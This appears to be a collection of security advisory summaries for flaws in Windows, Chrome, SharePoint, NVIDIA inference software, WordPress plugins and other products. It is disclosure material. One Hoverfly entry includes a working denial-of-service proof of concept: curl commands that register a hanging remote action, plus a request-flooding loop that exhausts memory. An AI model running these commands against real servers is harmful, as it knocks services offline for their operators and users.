Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.
Windows Audio Service on multiple Windows desktop and server versions improperly exposes sensitive information to locally authenticated standard users, enabling information disclosure without requiring elevated privileges. Affecting Windows 10 1809 through Windows 11 26H1 and Windows Server 2019 (with Server 2022 and 2025 referenced in tags), the flaw is exploitable post-foothold by any low-privileged local account, making it a realistic post-exploitation pivot rather than an initial access vector. No public exploit code has been identified at time of analysis, and a vendor-released patch is confirmed available via the Microsoft Security Response Center.
Uninitialized Use in Skia in Google Chrome prior to 150.0.7871.125 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High)
Uninitialized Use in V8 in Google Chrome prior to 150.0.7871.125 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High)
NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker can cause an authentication bypass through an alternative path or channel. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.
Navigation input validation bypass in Google Chrome prior to 150.0.7871.125 enables a remote attacker who has already compromised the renderer process to circumvent navigation restrictions through a crafted HTML page. The flaw is classified as a second-stage, chained exploit - the attacker must first achieve renderer process compromise before this vulnerability becomes exploitable. With integrity rated High (I:H) and no confidentiality or availability impact, the practical danger is unauthorized navigation control, potentially enabling redirect-based phishing, cross-origin frame manipulation, or security boundary bypass. No public exploit code or active exploitation has been identified at time of analysis; EPSS probability stands at 0.26% (17th percentile), consistent with low current threat activity.
Same Origin Policy bypass in Google Chrome's V8 JavaScript engine (prior to 150.0.7871.125) allows a remote attacker to cross origin security boundaries via a crafted HTML page, enabling high-impact integrity violations against cross-origin content. Exploitation requires the victim to visit the malicious page (UI:R), limiting automated mass exploitation - a constraint confirmed by SSVC's Automatable:no finding. No public exploit code has been identified and this vulnerability does not appear in the CISA KEV catalog; EPSS at 0.26% (17th percentile) is consistent with no observed active exploitation at time of analysis.
Same-origin policy bypass in Google Chrome prior to 150.0.7871.125 enables remote attackers to manipulate cross-origin content integrity through the browser's HTML-in-Canvas rendering subsystem. Exploitation requires a victim to visit a crafted HTML page, making this a socially-engineered attack rather than a fully autonomous one. No active exploitation has been recorded (CISA KEV: absent, SSVC exploitation: none), and EPSS sits at 0.26% - indicating low real-world exploitation activity at time of analysis.
Deserialization logic in FasterXML jackson-databind 2.15.0 through 2.18.7, 2.21.3, and 3.1.3 allows unauthenticated remote callers to bypass @JsonIgnore annotations on Java Record types when a PropertyNamingStrategy is configured. The renamed JSON key - e.g., 'internal_role' produced by SnakeCaseStrategy from 'internalRole' - is not registered in the ignore list, so Jackson's constructor-parameter binding accepts the attacker-supplied value despite the developer's explicit exclusion directive. No public exploit tooling has been identified at time of analysis, but the upstream fix PR includes a runnable proof-of-concept test that fully demonstrates the bypass, lowering the bar for independent reproduction.
Improper certificate validation in Windows Cryptographic Services allows an unauthorized attacker to bypass a security feature over a network.
Eclipse KUKSA Databroker 0.6.1 panics in a Tokio worker thread when an authenticated client sends a PublishValueRequest with a valid signal_id but omits the optional data_point field, causing the server to call Rust's unwrap() on a None value. Any client holding a valid JWT token can trigger this condition, cancelling the individual gRPC call while leaving the Databroker process intact and available. No public exploit has been identified and this vulnerability is not listed in CISA KEV; EPSS data was not supplied in available intelligence.
Incorrect access control in CAXPerts UniversalPlantViewer WebServices Server v2.7.6 allows any authenticated low-privilege user to invoke the /api/License/deactivateOffline endpoint and strip the server's license, rendering the service inoperable. The flaw (CWE-284) grants low-privileged accounts an action that should be restricted to administrative roles, providing a trivial denial-of-service primitive against industrial plant visualization infrastructure. No public exploit identified at time of analysis, though a researcher disclosure post on Medium appears to document the discovery.
OS command injection in Milestone Systems XProtect Management Server API enables authenticated users with edit permissions to execute arbitrary code as the Management Server Service. The CWE-78 flaw is network-accessible (AV:N) and requires no user interaction beyond possessing a privileged account, with CVSS 4.0 scope change metrics indicating high downstream impact (SC:H/SI:H/SA:H) to the broader surveillance infrastructure. No public exploit code or CISA KEV listing has been identified at time of analysis; Milestone has released patched versions addressed in their official advisory.
### Description Applications built with the Auth0 Symphony SDK, using the Authorizer security authenticator to protect HTTP routes may accept OAuth 2.0 bearer access tokens provided through a URL query parameter, in addition to the standard Authorization header, which may increase the risk of access token exposure and replay against protected API endpoints. ### Resolution Upgrade auth0/symfony to version 5.9.0 or greater. ### Acknowledgement Okta would like to thank Alex Yeara for their discovery.
### Summary: Remote post-serve actions use `http.DefaultClient` without any timeout configuration. When the remote endpoint is unreachable or intentionally slow (accepts TCP connection but never responds), each triggered proxy request spawns a goroutine that blocks indefinitely on `http.DefaultClient.Do()`. An attacker can cause unbounded goroutine accumulation leading to memory exhaustion and process crash (OOM kill). Unlike local post-serve action execution, this requires no binary execution, only a URL pointing to a non-responsive endpoint. ### Details: **1. Remote actions executed in goroutines without timeout (`core/hoverfly.go:224-228`):** ```go go postServeAction.Execute(result.Pair, journalIDChannel, hf.Journal) ``` Post-serve actions are executed in separate goroutines with no recovery wrapper. **2. HTTP client has no timeout (`core/action/action.go:128-143`):** ```go req, err := http.NewRequest("POST", action.Remote, bytes.NewBuffer(pairViewBytes)) // ... resp, err := http.DefaultClient.Do(req) // No timeout! Blocks forever. ``` `http.DefaultClient` has zero timeout by default in Go. If the remote server: - Accepts the TCP connection but never sends a response - Establishes TLS but never completes the handshake - Uses TCP window size 0 (flow control stall) ...the goroutine blocks indefinitely. There is no context cancellation, no deadline, and no cleanup. **3. No goroutine limit or backpressure:** There is no limit on how many post-serve action goroutines can be active simultaneously. Each matching proxy request spawns a new one unconditionally. **4. The goroutine is never cleaned up:** The only exit path from `Execute()` is a successful (or failed) HTTP response. A non-responding server means the goroutine lives until the process is killed. ### Environment: - **Hoverfly version:** v1.12.7 - **Operating System:** macOS Darwin 25.4.0 - **Go version:** 1.26.2 - **Configuration:** Default (no flags required) ### POC: **Step 1: Start a black-hole TCP listener (accepts connections, never responds)** ```bash # Option A: Use ncat ncat -l -k 9999 & # Option B: Use a non-routable IP (connections hang at TCP SYN) # 192.0.2.1 is TEST-NET-1, guaranteed non-routable # This causes http.DefaultClient to block on TCP connect timeout (which is also unlimited) ``` **Step 2: Register remote post-serve action pointing to the black hole** ```bash curl -X PUT http://localhost:8888/api/v2/hoverfly/post-serve-action \ -H "Content-Type: application/json" \ -d '{ "actionName": "leak", "remote": "http://192.0.2.1:9999/blackhole", "delayInMs": 0 }' ``` **Step 3: Load a catch-all simulation** ```bash curl -X PUT http://localhost:8888/api/v2/simulation \ -H "Content-Type: application/json" \ -d '{ "data": { "pairs": [{ "request": {"path": [{"matcher": "glob", "value": "*"}]}, "response": {"status": 200, "body": "ok", "postServeAction": "leak"} }], "globalActions": {"delays": [], "delaysLogNormal": []} }, "meta": {"schemaVersion": "v5.2"} }' ``` **Step 4: Flood with requests** ```bash # Each request spawns an immortal goroutine for i in $(seq 1 10000); do curl -s -x http://localhost:8500 "http://target.com/req${i}" & # Throttle to avoid local FD exhaustion [ $((i % 100)) -eq 0 ] && wait done ``` **Verified memory impact on Hoverfly v1.12.7:** ``` Memory before: 20,064 KB Memory after 50 requests: 23,376 KB Memory increase: 3,312 KB (66 KB per goroutine) ``` At this rate: - 1,000 requests = ~64 MB leaked - 10,000 requests = ~640 MB leaked - 100,000 requests = ~6.4 GB leaked → OOM crash ### Impact: An attacker with access to the admin API (unauthenticated by default) can cause a complete denial of service by: 1. Registering a remote post-serve action pointing to a non-responsive endpoint. 2. Loading a catch-all simulation that triggers the action on every request. 3. Sending proxy traffic, each request permanently leaks a goroutine and its associated memory.
Use of uninitialized resource in Windows RDP allows an unauthorized attacker to disclose information over a network.
Use of uninitialized resource in Windows RDP allows an unauthorized attacker to disclose information over a network.
Null pointer dereference in Windows SMB Server allows an authorized attacker to deny service over a network.
Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.
Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network.
Buffer over-read in Remote Desktop Client allows an unauthorized attacker to disclose information over a network.
Buffer over-read in Windows RDP allows an unauthorized attacker to disclose information over a network.
Use of uninitialized resource in Windows RDP allows an unauthorized attacker to disclose information over a network.
Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.
Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network.
Null pointer dereference in Windows Active Directory Domain Services (AD DS) enables a low-privileged authenticated attacker to crash the service remotely, causing denial of service across the affected domain. The flaw spans a wide range of Windows client and server releases, from Windows 10 version 1607 through Windows 11 version 26H1 and Windows Server 2012 through 2025. No public exploit code has been identified and this vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog at time of analysis, though the network-accessible attack surface and low privilege requirement lower the bar for abuse in environments with broad domain user access.
Use of uninitialized resource in Windows RDP allows an unauthorized attacker to disclose information over a network.
Arbitrary file read in Apache OpenMeetings 5.0.0 through 9.0.x allows any room moderator to exfiltrate files accessible to the OS account running the server, including credentials and secrets, via a crafted download request to the WhiteBoard download service. The vulnerability stems from insufficient path validation in the WB download endpoint, enabling directory traversal outside the intended file scope. No active exploitation has been confirmed (not in CISA KEV), but the ability to read credential files makes this high-priority for any internet-exposed deployment where moderator access is not tightly controlled.
Stored/reflected cross-site scripting in Microsoft SharePoint (Enterprise Server 2016, Server 2019, and Subscription Edition) lets an authenticated attacker inject script that executes in another user's browser session to spoof content over the network. Although Microsoft classifies the impact as 'spoofing,' the CVSS 3.1 vector rates confidentiality and integrity as High (C:H/I:H), indicating the injected script can access or alter sensitive session data. There is no public exploit identified at time of analysis, and a vendor patch is available.
Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.
Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.
Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.
Cross-site scripting in Microsoft SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition enables an authenticated attacker with low-privilege network access to inject malicious scripts into SharePoint pages, resulting in spoofing impacts when a victim user interacts with the crafted content. The CVSS vector (PR:L/UI:R) confirms exploitation requires both an existing authenticated account and victim interaction, constraining real-world risk relative to unauthenticated XSS variants. No public exploit identified at time of analysis and the vulnerability is not listed in the CISA KEV catalog. Vendor patch is available via the Microsoft Security Response Center.
Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.
Improper access control in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.
Stored Cross-Site Scripting in WP Customer Area WordPress plugin (versions up to and including 8.3.5) allows authenticated attackers with Contributor-level access or above to persistently inject arbitrary JavaScript via the unsanitized 'type' attribute of the customer-area-protected-content shortcode. The injected payload executes in the browser of any user who visits the compromised page, enabling session hijacking, credential theft, or malicious redirects against site visitors. No public exploit code has been identified and this CVE is not listed in the CISA KEV catalog at time of analysis; however, the Contributor-level prerequisite is a low barrier in multi-author WordPress environments.
NVIDIA TensorRT-LLM for Linux contains a vulnerability where an attacker could cause missing authentication for a critical function. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure.
NVIDIA TensorRT-LLM for any platform contains a vulnerability in visual gen server, where an attacker could cause an unsafe deserialization by unauthorized zeroMQ deserialization. A successful exploit of this vulnerability might lead to code execution.
TOCTOU Race Condition in specific trace commands of the TraceEvent() system call could allow an attacker with local access and with the PROCMGR_AID_TRACE ability, to cause information disclosure, data tampering or a crash of the QNX Neutrino kernel.
Untrusted search path in Microsoft XML allows an unauthorized attacker to bypass a security feature with a physical attack.
Privilege escalation via use-after-free in the Windows USB Print Driver affects Windows 11 (versions 24H2, 25H2, 26H1) and Windows Server 2025, requiring physical access to exploit. An attacker with hands-on access to a target machine can trigger a memory corruption condition through the USB print subsystem to achieve full local privilege escalation - High confidentiality, integrity, and availability impact per CVSS. No public exploit code has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.
Username spoofing via session data in Roundcube Webmail's password plugin allows an authenticated attacker to manipulate session state so that the plugin operates on a victim's account rather than the attacker's own, enabling password changes on the target account and full account takeover. All 1.6.x versions prior to 1.6.17 and all 1.7.x versions prior to 1.7.2 are affected when the password plugin is enabled. No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the high integrity and confidentiality impact ratings reflect genuine account hijacking potential in shared hosting environments.
Stored Cross-Site Scripting in the News Kit Addons For Elementor WordPress plugin (versions ≤1.4.6) permits authenticated contributors to persistently inject arbitrary JavaScript into pages via the Site Logo Title and Single Author Box widgets by manipulating the elementor_ajax AJAX save request to bypass client-side tag-name restrictions. Every user who subsequently visits an injected page executes the attacker's script in their browser, enabling session hijacking, credential theft, or admin-level actions on their behalf. No public exploit has been identified at time of analysis and the vulnerability is not listed in the CISA KEV catalog; a vendor-released patch is available in version 1.4.7.
Memory exhaustion in elixir-mint's HTTP/2 client library (mint) allows a malicious or attacker-controlled HTTP/2 server to crash any BEAM application using the library by streaming unbounded zero-length CONTINUATION frames that bypass the existing byte-size guard. Affected versions span mint 0.1.0 through 1.9.1; a vendor-released patch is confirmed in 1.9.2. No public exploit or CISA KEV listing exists at time of analysis, but the explicit SSRF and redirect attack vectors meaningfully increase realistic exposure for server-side Elixir applications that proxy user-supplied URLs.
HTTP request smuggling in Eclipse Grizzly before 5.0.2 stems from the framework's inability to correctly parse malformed trailer header lines in chunked HTTP requests, enabling CWE-444 boundary-confusion attacks. Remote unauthenticated attackers who can send crafted chunked requests through a front-end proxy to a GlassFish-backed server can cause the proxy and Grizzly to disagree on request boundaries, smuggling attacker-controlled content as the prefix of a subsequent legitimate user's request. No public exploit code and no CISA KEV listing have been identified at time of analysis, though the CVSS 4.0 AT:P condition signals that specific deployment prerequisites must be met.
Simple Machines Forum 2.1 prior to commit 4bf35cf and 3.0 prior to commit b4d23df contains a server-side request forgery vulnerability in the image proxy that allows authenticated attackers to trigger internal HTTP requests by embedding attacker-controlled URLs in BBCode image tags, which the proxy fetches without validating resolved destination IPs against private address ranges, loopback, or link-local addresses. Attackers can leverage SMF's automatic HMAC signature generation for any embedded image URL to obtain valid signed proxy requests targeting internal services such as cloud instance metadata endpoints, internal web applications, and container network services.
A security flaw was discovered in the NETGEAR DGND3700v1 that could allow someone on the same local WiFi network to send unauthorized commands to the device. This issue was identified through testing in a controlled research environment using a simulated version of the router's software and has not been confirmed on physical production devices.
MIME type restriction bypass in TYPO3 CMS 14.2.0-14.3.5 allows unauthenticated attackers to upload files of arbitrary MIME types through forms configured with FileUpload or ImageUpload elements, circumventing the allowedMimeTypes restriction entirely. The flaw originates from a lifecycle ordering defect in the server-side form framework: MimeTypeValidator is registered before concrete form definition properties are applied, so it is absent from the validation pipeline at runtime. No public exploit code and no CISA KEV listing have been identified at time of analysis, but the network-accessible, zero-prerequisite-auth nature of the bypass elevates practical risk wherever affected forms are publicly exposed.
Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Print Driver allows an authorized attacker to elevate privileges with a physical attack.
NVIDIA TensorRT-LLM for Linux contains a vulnerability where an attacker could cause improper control of code generation. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure.